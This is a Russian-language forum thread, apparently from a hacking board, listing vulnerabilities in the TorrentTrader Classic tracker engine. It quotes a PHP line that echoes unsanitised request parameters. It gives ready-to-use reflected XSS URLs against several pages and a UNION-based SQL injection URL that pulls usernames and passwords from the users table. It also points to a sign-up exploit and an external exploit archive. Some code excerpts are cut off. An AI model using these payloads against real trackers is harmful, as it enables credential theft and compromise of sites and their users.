![]() |
Трекер-движок TorrentTrader
Офф сайт = http://www.torrenttrader.org/
версия TorrentTrader Classic v1.09 XSS получается из за не достаточной обработки данных Код:
print("<p>" . SORT_BY . " <a href=" . $_SERVER[PHP_SELF] . "?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=votes>" . VOTES . "</a>, <a href=". $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=request>Request Name</a>, or <a href=" . $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=added>" . DATE_ADDED . "</a>.</p>");viewrequests.php?category=&filter=%3E%3Cscript%3Ea lert(/Hi/)%3C/script%3E&sort=votes версия TorrentTrader Classic v2.04 XSS torrents.php?parent_cat=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E p.S по структуре файлов похож на TBDev |
Открываем файл torrents-details.php :
Код:
//speed modКод:
http://localhost/torrents-details.php?id=1&Код:
http://localhost/torrents-details.php?id=1&Цитата:
Пассивки везде: Код:
http://localhost/themes/default/footer.php?ttversion=<script>alert(123);</script> |
TorrentTrader Classic 1.09
Version : 1.09 SQL Injection Vuln file: show-archived.php [str:23] PHP код:
if magic_quotes = OFF Код:
http://[host]/[path]/show-archived.php?id=1'+union+select+null,null,null,concat_ws(0x3a,username,password)+from+users+--+Vuln file: account-signup.php [str:73] PHP код:
Exploit: Код:
POST http://[host]/[path]/account-signup.php HTTP/1.0Другие уязвимости этого трэкера http://www.milw0rm.com/exploits/8958 |
| Время: 04:50 |